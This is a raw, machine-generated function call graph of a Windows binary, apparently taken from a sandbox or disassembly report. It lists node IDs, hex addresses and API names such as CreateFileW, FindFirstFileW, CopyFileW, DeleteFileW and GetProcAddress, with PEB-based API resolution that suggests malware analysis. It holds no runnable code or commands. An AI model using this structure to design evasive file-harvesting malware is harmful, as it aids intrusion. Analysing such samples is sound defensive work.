9771 405762 4 API calls 9770->9771 9771->9769 9773 402b7c 2 API calls 9772->9773 9775 404c60 9773->9775 9774 404ca4 9774->9763 9775->9774 9776 4031e5 4 API calls 9775->9776 9777 404c8d 9776->9777 9777->9774 9778 402bab 2 API calls 9777->9778 9778->9774 9779 41045c 9780 4040bb 13 API calls 9779->9780 9781 410477 9780->9781 9782 41060b 9781->9782 9810 407851 9781->9810 9784 41048f 9786 407851 2 API calls 9784->9786 9791 410604 9784->9791 9785 403f9e 5 API calls 9785->9782 9787 4104a9 9786->9787 9792 4105e0 9787->9792 9793 405ae9 6 API calls 9787->9793 9795 41056f 9787->9795 9796 4105eb 9787->9796 9788 402bab 2 API calls 9790 4105fb 9788->9790 9789 402bab 2 API calls 9789->9791 9790->9789 9791->9785 9794 402bab 2 API calls 9792->9794 9792->9796 9793->9787 9794->9796 9795->9792 9797 4105d6 9795->9797 9799 412269 6 API calls 9795->9799 9796->9788 9796->9790 9798 402bab 2 API calls 9797->9798 9798->9792 9800 410580 9799->9800 9800->9797 9801 405872 4 API calls 9800->9801 9802 410599 9801->9802 9803 405872 4 API calls 9802->9803 9804 4105a9 9803->9804 9805 405872 4 API calls 9804->9805 9806 4105bb 9805->9806 9807 405872 4 API calls 9806->9807 9808 4105cd 9807->9808 9809 402bab 2 API calls 9808->9809 9809->9797 9811 407866 9810->9811 9812 402b7c 2 API calls 9811->9812 9813 407899 9811->9813 9812->9813 9813->9784 9216 40f561 9219 40f4b6 9216->9219 9220 413b28 6 API calls 9219->9220 9221 40f4bf 9220->9221 9222 405b6f 6 API calls 9221->9222 9223 402bab GetProcessHeap RtlFreeHeap 9221->9223 9224 413a58 14 API calls 9221->9224 9225 40f559 9221->9225 9222->9221 9223->9221 9224->9221 9229 403b64 9230 4031e5 4 API calls 9229->9230 9231 403b77 PathFileExistsW 9230->9231 9845 40d069 9846 404bee 6 API calls 9845->9846 9847 40d080 9846->9847 9848 404bee 6 API calls 9847->9848 9870 40d1e2 9847->9870 9849 40d099 9848->9849 9850 404bee 6 API calls 9849->9850 9851 40d0a7 9850->9851 9886 404ba7 9851->9886 9854 404bee 6 API calls 9855 40d0c5 9854->9855 9856 404c4e 6 API calls 9855->9856 9857 40d0dc 9856->9857 9858 404bee 6 API calls 9857->9858 9859 40d0eb 9858->9859 9860 404ba7 4 API calls 9859->9860 9861 40d0fa 9860->9861 9862 404bee 6 API calls 9861->9862 9863 40d109 9862->9863 9864 404c4e 6 API calls 9863->9864 9865 40d123 9864->9865 9866 405872 4 API calls 9865->9866 9865->9870 9867 40d14a 9866->9867 9868 405872 4 API calls 9867->9868 9869 40d159 9868->9869 9871 405872 4 API calls 9869->9871 9872 40d16b 9871->9872 9873 405781 4 API calls 9872->9873 9874 40d179 9873->9874 9875 405872 4 API calls 9874->9875 9876 40d18b 9875->9876 9877 405762 4 API calls 9876->9877 9878 40d19f 9877->9878 9879 405872 4 API calls 9878->9879 9880 40d1b1 9879->9880 9881 405781 4 API calls 9880->9881 9882 40d1bf 9881->9882 9883 405872 4 API calls 9882->9883 9884 40d1d1 9883->9884 9885 405762 4 API calls 9884->9885 9885->9870 9887 4031e5 4 API calls 9886->9887 9888 404bca 9887->9888 9888->9854 9258 40f16e 9259 4056bf 2 API calls 9258->9259 9260 40f17b 9259->9260 9261 412093 8 API calls 9260->9261 9262 40f19e 9261->9262 9263 412093 8 API calls 9262->9263 9264 40f1b6 9263->9264 9265 412093 8 API calls 9264->9265 9266 40f1cc 9265->9266 9267 412093 8 API calls 9266->9267 9268 40f1e2 9267->9268 9269 413aca 4 API calls 9268->9269 9270 40f1ef 9269->9270 9271 405695 2 API calls 9270->9271 9272 40f1fa 9271->9272 9273 40ce71 9274 413b28 6 API calls 9273->9274 9275 40ce78 9274->9275 9276 405b6f 6 API calls 9275->9276 9281 40ce83 9276->9281 9277 40cec1 9278 403fbf 7 API calls 9277->9278 9279 40cecc 9278->9279 9280 40cefb 9279->9280 9283 403d74 7 API calls 9279->9283 9281->9277 9282 40ceba 9281->9282 9284 403d74 7 API calls 9281->9284 9285 402bab 2 API calls 9282->9285 9286 40cee7 9283->9286 9287 40cead 9284->9287 9285->9277 9288 40cef4 9286->9288 9289 402bab 2 API calls 9286->9289 9287->9282 9291 402bab 2 API calls 9287->9291 9290 402bab 2 API calls 9288->9290 9289->9288 9290->9280 9291->9282 9292 406472 9293 4031e5 4 API calls 9292->9293 9294 406484 Sleep 9293->9294 9962 40f204 9963 405781 4 API calls 9962->9963 9964 40f214 9963->9964 9965 4057df 14 API calls 9964->9965 9966 40f226 9965->9966 9352 403c08 9353 4031e5 4 API calls 9352->9353 9354 403c1a DeleteFileW 9353->9354 9355 410a09 9356 41219c 15 API calls 9355->9356 9357 410a1b 9356->9357 9358 41219c 15 API calls 9357->9358 9359 410a23 9358->9359 9360 41219c 15 API calls 9359->9360 9361 410a2c 9360->9361 9362 41219c 15 API calls 9361->9362 9363 410a38 9362->9363 9364 404b22 6 API calls 9363->9364 9365 410a4c 9364->9365 9366 410a7a 9365->9366 9367 403fbf 7 API calls 9365->9367 9368 410a5c 9367->9368 9369 410a71 9368->9369 9371 413a58 14 API calls 9368->9371 9370 402bab 2 API calls 9369->9370 9370->9366 9372 410a6b 9371->9372 9373 402bab 2 API calls 9372->9373 9373->9369 9967 410d09 9968 410d56 9967->9968 9969 410d17 9967->9969 9971 413a58 14 API calls 9968->9971 9983 406642 9969->9983 9973 410d6f 9971->9973 9974 4056bf 2 API calls 9975 410d2e 9974->9975 9996 405641 9975->9996 9977 410d41 9978 413aca 4 API calls 9977->9978 9979 410d4a 9978->9979 9980 405695 2 API calls 9979->9980 9981 410d50 9980->9981 9982 4036a3 4 API calls 9981->9982 9982->9968 9984 406662 9983->9984 9985 4031e5 4 API calls 9984->9985 9986 406676 9985->9986 10000 4066bf 9986->10000 9991 4066b1 9994 4036a3 4 API calls 9991->9994 9992 4066a7 9993 4036a3 4 API calls 9992->9993 9995 4066ac 9993->9995 9994->9995 9995->9968 9995->9974 9997 405673 9996->9997 9998 40564d 9996->9998 9997->9977 9998->9997 9999 4056fc 4 API calls 9998->9999 9999->9997 10001 4031e5 4 API calls 10000->10001 10002 4066dc 10001->10002 10003 4066f6 SetLastError 10002->10003 10004 406708 GetLastError 10002->10004 10014 406693 10003->10014 10005 406713 10004->10005 10004->10014 10006 4031e5 4 API calls 10005->10006 10007 406725 10006->10007 10008 4031e5 4 API calls 10007->10008 10007->10014 10009 40673f 10008->10009 10010 406753 10009->10010 10011 406749 10009->10011 10013 4031e5 4 API calls 10010->10013 10012 4036a3 4 API calls 10011->10012 10012->10014 10015 406761 10013->10015 10022 406455 10014->10022 10016 40678a 10015->10016 10017 40677c 10015->10017 10019 4036a3 4 API calls 10016->10019 10018 4036a3 4 API calls 10017->10018 10020 406781 10018->10020 10019->10014 10021 4036a3 4 API calls 10020->10021 10021->10014 10023 4031e5 4 API calls 10022->10023 10024 406468 10023->10024 10024->9991 10024->9992 9374 40c509 9375 412093 8 API calls 9374->9375 9376 40c51e 9375->9376 9383 40910d 9384 404b22 6 API calls 9383->9384 9385 409124 9384->9385 9386 405b6f 6 API calls 9385->9386 9391 40917a 9385->9391 9387 40913e 9386->9387 9388 404b22 6 API calls 9387->9388 9396 409173 9387->9396 9390 409153 9388->9390 9389 402bab 2 API calls 9389->9391 9392 40916a 9390->9392 9393 409408 16 API calls 9390->9393 9394 402bab 2 API calls 9392->9394 9395 409164 9393->9395 9394->9396 9397 402bab 2 API calls 9395->9397 9396->9389 9397->9392 9401 410410 9402 4056bf 2 API calls 9401->9402 9403 41041b 9402->9403 9404 412093 8 API calls 9403->9404 9405 41043c 9404->9405 9406 413aca 4 API calls 9405->9406 9407 410449 9406->9407 9408 405695 2 API calls 9407->9408 9409 410454 9408->9409 9436 40c71a 9437 41219c 15 API calls 9436->9437 9438 40c728 9437->9438 10080 410b1a 10081 404bee 6 API calls 10080->10081 10082 410b31 10081->10082 10083 404bee 6 API calls 10082->10083 10108 410c6d 10082->10108 10084 410b5a 10083->10084 10085 404bee 6 API calls 10084->10085 10086 410b69 10085->10086 10087 404bee 6 API calls 10086->10087 10088 410b78 10087->10088 10089 404ba7 4 API calls 10088->10089 10090 410b86 10089->10090 10091 404ba7 4 API calls 10090->10091 10092 410b95 10091->10092 10093 405872 4 API calls 10092->10093 10092->10108 10094 410bd7 10093->10094 10095 405872 4 API calls 10094->10095 10096 410be8 10095->10096 10097 405872 4 API calls 10096->10097 10098 410bf9 10097->10098 10099 405781 4 API calls 10098->10099 10100 410c07 10099->10100 10101 405781 4 API calls 10100->10101 10105 410c15 10101->10105 10102 410c4e 10103 405762 4 API calls 10102->10103 10104 410c60 10103->10104 10106 403f9e 5 API calls 10104->10106 10104->10108 10105->10102 10113 405e5a 10105->10113 10106->10108 10110 4040bb 13 API calls 10111 410c44 10110->10111 10112 402bab 2 API calls 10111->10112 10112->10102 10114 402b7c 2 API calls 10113->10114 10115 405e72 10114->10115 10116 405ea3 10115->10116 10117 4031e5 4 API calls 10115->10117 10116->10102 10116->10110 10118 405e94 10117->10118 10118->10116 10119 402bab 2 API calls 10118->10119 10119->10116 10120 40f81c 10121 404bee 6 API calls 10120->10121 10122 40f833 10121->10122 10123 404bee 6 API calls 10122->10123 10137 40f94f 10122->10137 10124 40f85c 10123->10124 10125 404bee 6 API calls 10124->10125 10126 40f86b 10125->10126 10127 404bee 6 API calls 10126->10127 10128 40f87a 10127->10128 10129 404bee 6 API calls 10128->10129 10130 40f888 10129->10130 10131 404ba7 4 API calls 10130->10131 10132 40f897 10131->10132 10133 405872 4 API calls 10132->10133 10132->10137 10134 40f8d8 10133->10134 10135 405872 4 API calls 10134->10135 10136 40f8ea 10135->10136 10138 405872 4 API calls 10136->10138 10139 40f8fa 10138->10139 10140 405872 4 API calls 10139->10140 10141 40f90c 10140->10141 10142 405781 4 API calls 10141->10142 10143 40f91d 10142->10143 10144 4040bb 13 API calls 10143->10144 10145 40f92d 10144->10145 10146 405762 4 API calls 10145->10146 10147 40f93f 10146->10147 10147->10137 10148 403f9e 5 API calls 10147->10148 10148->10137 9451 402c1f 9452 4031e5 4 API calls 9451->9452 9453 402c31 LoadLibraryW 9452->9453 10158 407e1f 10159 407e2c 10158->10159 10164 407e61 10158->10164 10162 407e3e 10159->10162 10165 402bab 2 API calls 10159->10165 10167 407e51 10159->10167 10160 407ea6 10161 407eb6 10160->10161 10166 402bab 2 API calls 10160->10166 10161->10167 10168 402bab 2 API calls 10161->10168 10163 407ed4 10162->10163 10169 402bab 2 API calls 10162->10169 10164->10160 10164->10161 10170 405872 4 API calls 10164->10170 10165->10162 10166->10161 10167->10163 10171 402bab 2 API calls 10167->10171 10168->10167 10169->10167 10172 407e86 10170->10172 10171->10163 10173 405872 4 API calls 10172->10173 10174 407e96 10173->10174 10175 405872 4 API calls 10174->10175 10175->10160 10176 40fa23 10177 40fa39 10176->10177 10178 410293 10177->10178 10179 405b6f 6 API calls 10177->10179 10180 40ffcc 10179->10180 10180->10178 10181 4040bb 13 API calls 10180->10181 10182 40ffeb 10181->10182 10183 41028c 10182->10183 10185 402b7c 2 API calls 10182->10185 10231 41027d 10182->10231 10184 402bab 2 API calls 10183->10184 10184->10178 10187 41001e 10185->10187 10186 403f9e 5 API calls 10186->10183 10188 40a423 4 API calls 10187->10188 10187->10231 10189 41004a 10188->10189 10190 4031e5 4 API calls 10189->10190 10191 41005c 10190->10191 10192 4031e5 4 API calls 10191->10192 10193 410079 10192->10193 10194 4031e5 4 API calls 10193->10194 10195 410096 10194->10195 10196 4031e5 4 API calls 10195->10196 10197 4100b0 10196->10197 10198 4031e5 4 API calls 10197->10198 10199 4100cd 10198->10199 10200 4031e5 4 API calls 10199->10200 10201 4100ea 10200->10201 10232 412516 10201->10232 10203 4100fd 10204 40642c 5 API calls 10203->10204 10205 41013e 10204->10205 10206 410142 10205->10206 10207 41019f 10205->10207 10208 40488c 5 API calls 10206->10208 10210 4031e5 4 API calls 10207->10210 10209 410151 10208->10209 10211 404866 4 API calls 10209->10211 10212 41019c 10209->10212 10223 4101bb 10210->10223 10213 410163 10211->10213 10214 40642c 5 API calls 10212->10214 10215 41022a 10212->10215 10217 406c4c 6 API calls 10213->10217 10229 41018e 10213->10229 10216 410201 10214->10216 10218 413a58 14 API calls 10215->10218 10220 410205 10216->10220 10221 41022f 10216->10221 10224 410178 10217->10224 10228 41026e 10218->10228 10219 403c40 5 API calls 10219->10212 10225 4126a7 7 API calls 10220->10225 10235 4125db 10221->10235 10226 4031e5 4 API calls 10223->10226 10227 406c4c 6 API calls 10224->10227 10225->10215 10226->10212 10227->10229 10230 402bab 2 API calls 10228->10230 10229->10219 10230->10231 10231->10186 10233 4031e5 4 API calls 10232->10233 10234 412539 10233->10234 10234->10203 10236 40488c 5 API calls 10235->10236 10237 4125ec 10236->10237 10238 4031e5 4 API calls 10237->10238 10242 41269f 10237->10242 10239 412609 10238->10239 10240 4031e5 4 API calls 10239->10240 10247 41268f 10239->10247 10243 41262a 10240->10243 10241 403c40 5 API calls 10241->10242 10242->10215 10244 412675 10243->10244 10252 4124f1 10243->10252 10245 4031e5 4 API calls 10244->10245 10245->10247 10247->10241 10249 412663 10250 4031e5 4 API calls 10249->10250 10250->10244 10251 4124f1 4 API calls 10251->10249 10253 4031e5 4 API calls 10252->10253 10254 412503 10253->10254 10254->10249 10254->10251 9466 405924 9467 4031e5 4 API calls 9466->9467 9468 405937 StrStrW 9467->9468 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4056bf 2 API calls 10265->10266 10277 4109a4 10265->10277 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 402bab 2 API calls 10269->10270 10271 410990 10269->10271 10278 41080e 10269->10278 10270->10269 10272 413aca 4 API calls 10271->10272 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10277 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10269 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10296 410748 10294->10296 10295 402bab 2 API calls 10295->10292 10297 402b7c 2 API calls 10296->10297 10299 4107fd 10296->10299 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10295 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9524 40f12f 9525 41219c 15 API calls 9524->9525 9526 40f13f 9525->9526 9527 41219c 15 API calls 9526->9527 9528 40f14c 9527->9528 9529 41219c 15 API calls 9528->9529 9530 40f159 9529->9530 9531 41219c 15 API calls 9530->9531 9532 40f166 9531->9532 9539 40ed35 9540 4056bf 2 API calls 9539->9540 9541 40ed42 9540->9541 9542 412093 8 API calls 9541->9542 9543 40ed63 9542->9543 9544 412093 8 API calls 9543->9544 9545 40ed73 9544->9545 9546 413aca 4 API calls 9545->9546 9547 40ed80 9546->9547 9548 405695 2 API calls 9547->9548 9549 40ed8e 9548->9549 8076 40f3c5 8081 41219c 8076->8081 8079 41219c 15 API calls 8080 40f3e1 8079->8080 8082 4121b1 8081->8082 8098 40f3d3 8081->8098 8083 4121be 8082->8083 8086 4121c5 8082->8086 8129 413ba4 8083->8129 8085 4121ca 8099 404056 8085->8099 8086->8085 8092 412210 8086->8092 8088 4121c3 8088->8098 8106 405b6f 8088->8106 8091 41224d 8095 402bab 2 API calls 8091->8095 8091->8098 8092->8098 8134 403fbf 8092->8134 8095->8098 8098->8079 8145 402b7c GetProcessHeap RtlAllocateHeap 8099->8145 8101 404066 8103 404095 8101->8103 8147 4031e5 8101->8147 8103->8088 8105 402bab 2 API calls 8105->8103 8107 405b7d 8106->8107 8108 402b7c 2 API calls 8107->8108 8109 405b99 8108->8109 8110 405c02 8109->8110 8183 4059b8 8109->8183 8110->8091 8119 413a58 8110->8119 8112 405c09 8115 402bab 2 API calls 8112->8115 8113 405bba 8113->8112 8114 402b7c 2 API calls 8113->8114 8116 405bdd 8114->8116 8115->8110 8116->8112 8117 405be4 8116->8117 8118 402bab 2 API calls 8117->8118 8118->8110 8120 413a63 8119->8120 8128 412245 8119->8128 8120->8128 8186 405781 8120->8186 8123 405781 4 API calls 8124 413aa0 8123->8124 8189 4057df 8124->8189 8127 405781 4 API calls 8127->8128 8142 402bab 8128->8142 8130 413bad 8129->8130 8131 404056 6 API calls 8130->8131 8133 413bb8 8130->8133 8132 413bc5 8131->8132 8132->8088 8133->8088 8135 402b7c 2 API calls 8134->8135 8137 403fcf 8135->8137 8136 403ff4 8136->8088 8137->8136 8308 403b98 8137->8308 8140 403ff8 GetLastError 8141 402bab 2 API calls 8140->8141 8141->8136 8143 402bb4 GetProcessHeap RtlFreeHeap 8142->8143 8144 402bc6 8142->8144 8143->8144 8144->8091 8146 402b98 8145->8146 8146->8101 8148 4031f3 8147->8148 8149 403236 8147->8149 8148->8149 8152 403208 8148->8152 8158 4030a5 8149->8158 8151 403224 8153 403258 8151->8153 8155 4031e5 4 API calls 8151->8155 8164 403263 8152->8164 8153->8103 8153->8105 8155->8153 8156 40320d 8156->8153 8157 4030a5 4 API calls 8156->8157 8157->8151 8170 402ca4 8158->8170 8160 4030b0 8161 4030b5 8160->8161 8174 4030c4 8160->8174 8161->8151 8165 40326d 8164->8165 8166 402b7c 2 API calls 8165->8166 8169 4032b7 8165->8169 8167 40328c 8166->8167 8168 402b7c 2 API calls 8167->8168 8168->8169 8169->8156 8171 403079 8170->8171 8172 40307c 8171->8172 8178 40317b GetPEB 8171->8178 8172->8160 8176 4030eb 8174->8176 8175 4030c0 8175->8151 8176->8175 8180 402c03 8176->8180 8179 40319b 8178->8179 8179->8172 8181 4031e5 3 API calls 8180->8181 8182 402c15 GetProcAddress 8181->8182 8182->8175 8184 4031e5 4 API calls 8183->8184 8185 4059cb 8184->8185 8185->8113 8204 405797 8186->8204 8188 405792 8188->8123 8190 405832 8189->8190 8191 4057eb 8189->8191 8190->8127 8190->8128 8191->8190 8214 4040bb 8191->8214 8194 405839 8195 405853 8194->8195 8241 405627 8194->8241 8252 405762 8195->8252 8196 40582c 8238 403f9e 8196->8238 8203 403f9e 5 API calls 8203->8190 8205 4057a1 8204->8205 8206 4057bd 8204->8206 8205->8206 8208 4056fc 8205->8208 8206->8188 8209 405714 8208->8209 8210 402b7c 2 API calls 8209->8210 8211 405730 8210->8211 8212 402bab 2 API calls 8211->8212 8213 405752 8211->8213 8212->8213 8213->8206 8215 4031e5 4 API calls 8214->8215 8216 4040d5 CreateFileW 8215->8216 8217 4040f8 8216->8217 8218 40418d 8216->8218 8219 4031e5 4 API calls 8217->8219 8220 404183 8218->8220 8258 403c90 8218->8258 8226 404105 8219->8226 8220->8190 8220->8194 8220->8196 8223 40416d 8255 403c40 8223->8255 8225 4041b3 8228 4040bb 10 API calls 8225->8228 8231 4041c8 8225->8231 8226->8223 8230 4031e5 4 API calls 8226->8230 8228->8231 8229 402bab 2 API calls 8229->8220 8232 404131 VirtualAlloc 8230->8232 8231->8229 8232->8223 8233 404142 8232->8233 8234 4031e5 4 API calls 8233->8234 8235 40414f ReadFile 8234->8235 8235->8223 8236 404160 8235->8236 8237 4031e5 4 API calls 8236->8237 8237->8223 8239 4031e5 4 API calls 8238->8239 8240 403fb1 VirtualFree 8239->8240 8240->8190 8242 4031e5 4 API calls 8241->8242 8243 40563a 8242->8243 8244 405872 8243->8244 8246 405881 8244->8246 8245 4058bc 8248 405797 4 API calls 8245->8248 8249 4058af 8245->8249 8246->8245 8305 4058d4 8246->8305 8248->8249 8249->8195 8251 405781 4 API calls 8251->8245 8253 405781 4 API calls 8252->8253 8254 405770 8253->8254 8254->8203 8256 4031e5 4 API calls 8255->8256 8257 403c52 FindCloseChangeNotification 8256->8257 8257->8220 8259 403ca3 8258->8259 8262 403caa 8258->8262 8285 405dc5 8259->8285 8261 404056 6 API calls 8263 403cbe 8261->8263 8262->8261 8264 403d3a 8262->8264 8265 403d2e 8263->8265 8266 403d17 8263->8266 8267 403ccf 8263->8267 8264->8220 8281 403c59 8264->8281 8265->8264 8268 402bab 2 API calls 8265->8268 8269 405b6f 6 API calls 8266->8269 8270 405b6f 6 API calls 8267->8270 8268->8264 8272 403d14 8269->8272 8271 403cdd 8270->8271 8273 405b6f 6 API calls 8271->8273 8274 402bab 2 API calls 8272->8274 8275 403cee 8273->8275 8274->8265 8275->8272 8290 403d4d 8275->8290 8278 403d0b 8280 402bab 2 API calls 8278->8280 8280->8272 8282 403c21 8281->8282 8283 4031e5 4 API calls 8282->8283 8284 403c33 CopyFileW 8283->8284 8284->8225 8299 406799 8285->8299 8287 405dd5 8288 402b7c 2 API calls 8287->8288 8289 405dfe 8288->8289 8289->8262 8302 403bb7 8290->8302 8292 403cfe 8292->8278 8293 403c62 8292->8293 8294 403d4d 5 API calls 8293->8294 8295 403c6d 8294->8295 8296 403c72 8295->8296 8297 4031e5 4 API calls 8295->8297 8296->8278 8298 403c87 CreateDirectoryW 8297->8298 8298->8278 8300 4031e5 4 API calls 8299->8300 8301 4067ad 8300->8301 8301->8287 8303 4031e5 4 API calls 8302->8303 8304 403bc9 GetFileAttributesW 8303->8304 8304->8292 8306 405797 4 API calls 8305->8306 8307 4058a8 8306->8307 8307->8249 8307->8251 8309 4031e5 4 API calls 8308->8309 8310 403baa 8309->8310 8310->8136 8310->8140 9664 40ebc6 9665 4040bb 13 API calls 9664->9665 9666 40ebdf 9665->9666 9667 40ecd7 9666->9667 9684 407795 9666->9684 9670 40eccd 9671 403f9e 5 API calls 9670->9671 9671->9667 9672 4056bf 2 API calls 9682 40ec12 9672->9682 9673 40ecb5 9674 402bab 2 API calls 9673->9674 9675 40ecbd 9674->9675 9676 413aca 4 API calls 9675->9676 9677 40ecc7 9676->9677 9678 405695 2 API calls 9677->9678 9678->9670 9679 407908 GetProcessHeap RtlAllocateHeap 9679->9682 9681 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9681->9682 9682->9673 9682->9679 9682->9681 9683 402bab GetProcessHeap RtlFreeHeap 9682->9683 9695 412269 9682->9695 9683->9682 9685 4077ab 9684->9685 9691 4077b3 9685->9691 9702 405ae9 9685->9702 9687 4077e1 9688 4077f8 9687->9688 9690 407802 9687->9690 9687->9691 9689 402bab 2 API calls 9688->9689 9689->9691 9692 402b7c 2 API calls 9690->9692 9691->9670 9691->9672 9693 407811 9692->9693 9694 402bab 2 API calls 9693->9694 9694->9691 9718 40374e 9695->9718 9700 402bab 2 API calls 9701 412299 9700->9701 9701->9682 9703 405af7 9702->9703 9704 402b7c 2 API calls 9703->9704 9705 405b03 9704->9705 9714 405b5a 9705->9714 9715 405998 9705->9715 9707 405b21 9708 405b61 9707->9708 9710 402b7c 2 API calls 9707->9710 9709 402bab 2 API calls 9708->9709 9709->9714 9711 405b39 9710->9711 9711->9708 9712 405b40 9711->9712 9713 402bab 2 API calls 9712->9713 9713->9714 9714->9687 9716 4031e5 4 API calls 9715->9716 9717 4059ab 9716->9717 9717->9707 9719 402b7c 2 API calls 9718->9719 9721 40375f 9719->9721 9720 4037a3 9720->9701 9725 4037be 9720->9725 9721->9720 9722 4031e5 4 API calls 9721->9722 9723 40378f 9722->9723 9723->9720 9724 402bab 2 API calls 9723->9724 9724->9720 9726 4031e5 4 API calls 9725->9726 9727 4037e2 9726->9727 9728 40382b 9727->9728 9729 402b7c 2 API calls 9727->9729 9728->9700 9730 403802 9729->9730 9731 403832 9730->9731 9733 403809 9730->9733 9732 4036a3 4 API calls 9731->9732 9732->9728 9734 4036a3 4 API calls 9733->9734 9734->9728 8908 410cd1 8913 412093 8908->8913 8911 412093 8 API calls 8912 410cff 8911->8912 8915 4120a5 8913->8915 8934 410cf1 8913->8934 8914 4120b3 8916 404056 6 API calls 8914->8916 8915->8914 8919 412100 8915->8919 8917 4120ba 8916->8917 8918 405b6f 6 API calls 8917->8918 8920 412152 8917->8920 8917->8934 8921 412125 8918->8921 8923 403fbf 7 API calls 8919->8923 8919->8934 8935 403d74 8920->8935 8921->8920 8926 412139 8921->8926 8927 41214d 8921->8927 8923->8917 8925 41218c 8931 402bab 2 API calls 8925->8931 8925->8934 8930 402bab 2 API calls 8926->8930 8929 402bab 2 API calls 8927->8929 8928 402bab 2 API calls 8928->8925 8929->8920 8932 41213e 8930->8932 8931->8934 8933 402bab 2 API calls 8932->8933 8933->8934 8934->8911 8936 403d87 8935->8936 8937 403ea3 8936->8937 8938 405b6f 6 API calls 8936->8938 8939 405b6f 6 API calls 8937->8939 8940 403da3 8938->8940 8941 403eb9 8939->8941 8940->8937 8943 4031e5 4 API calls 8940->8943 8942 4031e5 4 API calls 8941->8942 8947 403f6f 8941->8947 8944 403ed3 FindFirstFileW 8942->8944 8945 403dbc 8943->8945 8961 403ee8 8944->8961 8964 403f8d 8944->8964 8949 4031e5 4 API calls 8945->8949 8952 403e96 8945->8952 8953 405b6f 6 API calls 8945->8953 8959 403e9c 8945->8959 8965 403d74 6 API calls 8945->8965 8966 402bab 2 API calls 8945->8966 8967 403f63 8945->8967 8946 402bab 2 API calls 8946->8947 8947->8925 8947->8928 8948 402bab 2 API calls 8948->8937 8949->8945 8950 4031e5 4 API calls 8950->8961 8951 405b6f 6 API calls 8951->8961 8971 403bef 8952->8971 8953->8945 8954 403f75 8957 402bab 2 API calls 8954->8957 8956 403f87 8958 403bef 4 API calls 8956->8958 8960 403f7b 8957->8960 8958->8964 8959->8948 8962 403bef 4 API calls 8960->8962 8961->8950 8961->8951 8961->8954 8961->8956 8963 402bab 2 API calls 8961->8963 8962->8947 8963->8961 8964->8946 8965->8945 8966->8945 8968 402bab 2 API calls 8967->8968 8969 403f69 8968->8969 8970 403bef 4 API calls 8969->8970 8970->8947 8972 4031e5 4 API calls 8971->8972 8973 403c01 8972->8973 8973->8959 9160 4049dc 9161 4031e5 4 API calls 9160->9161 9162 4049ef 9161->9162 9817 40cddd 9818 405b6f 6 API calls 9817->9818 9819 40cdee 9818->9819 9820 40ce06 9819->9820 9821 413a58 14 API calls 9819->9821 9823 405b6f 6 API calls 9820->9823 9830 40ce59 9820->9830 9822 40ce00 9821->9822 9824 402bab 2 API calls 9822->9824 9825 40ce1c 9823->9825 9824->9820 9826 40ce52 9825->9826 9827 403d74 7 API calls 9825->9827 9825->9830 9828 402bab 2 API calls 9826->9828 9829 40ce45 9827->9829 9828->9830 9829->9826 9831 402bab 2 API calls 9829->9831 9831->9826 9163 40ecde 9164 412093 8 API calls 9163->9164 9165 40ecfd 9164->9165 9166 412093 8 API calls 9165->9166 9167 40ed0d 9166->9167 9171 40e8df 9172 412093 8 API calls 9171->9172 9173 40e8f8 9172->9173 9174 412093 8 API calls 9173->9174 9175 40e908 9174->9175 9182 404b22 9175->9182 9177 40e91c 9178 40e936 9177->9178 9181 40e93d 9177->9181 9189 40e944 9177->9189 9180 402bab 2 API calls 9178->9180 9180->9181 9183 402b7c 2 API calls 9182->9183 9185 404b33 9183->9185 9184 404b66 9184->9177 9185->9184 9198 4049b3 9185->9198 9188 402bab 2 API calls 9188->9184 9190 4056bf 2 API calls 9189->9190 9191 40e952 9190->9191 9192 40e976 9191->9192 9193 4057df 14 API calls 9191->9193 9192->9178 9194 40e966 9193->9194 9195 413aca 4 API calls 9194->9195 9196 40e970 9195->9196 9197 405695 2 API calls 9196->9197 9197->9192 9199 4031e5 4 API calls 9198->9199 9200 4049c6 9199->9200 9200->9184 9200->9188 9201 4139de 9210 413855 9201->9210 9203 4139f1 9204 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9203->9204 9207 4139f7 9204->9207 9205 413866 53 API calls 9206 413a2d 9205->9206 9208 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9206->9208 9207->9205 9209 413a34 9208->9209 9211 4031e5 4 API calls 9210->9211 9212 413864 9211->9212 9212->9212 9837 4116e7 9838 4117ba 9837->9838 9839 405b6f 6 API calls 9838->9839 9844 4117f1 9838->9844 9840 4117d0 9839->9840 9841 404cbf 8 API calls 9840->9841 9840->9844 9842 4117eb 9841->9842 9843 402bab 2 API calls 9842->9843 9843->9844 9232 4094e7 9233 404b22 6 API calls 9232->9233 9234 4094fe 9233->9234 9235 409554 9234->9235 9236 405b6f 6 API calls 9234->9236 9237 409514 9236->9237 9239 404b22 6 API calls 9237->9239 9244 40954d 9237->9244 9238 402bab 2 API calls 9238->9235 9240 40952d 9239->9240 9241 409408 16 API calls 9240->9241 9246 409544 9240->9246 9243 40953e 9241->9243 9242 402bab 2 API calls 9242->9244 9245 402bab 2 API calls 9243->9245 9244->9238 9245->9246 9246->9242 9255 4058ea 9256 4031e5 4 API calls 9255->9256 9257 4058fd StrStrA 9256->9257 9889 40d4ea 9890 404bee 6 API calls 9889->9890 9891 40d500 9890->9891 9892 40d5a0 9891->9892 9893 404bee 6 API calls 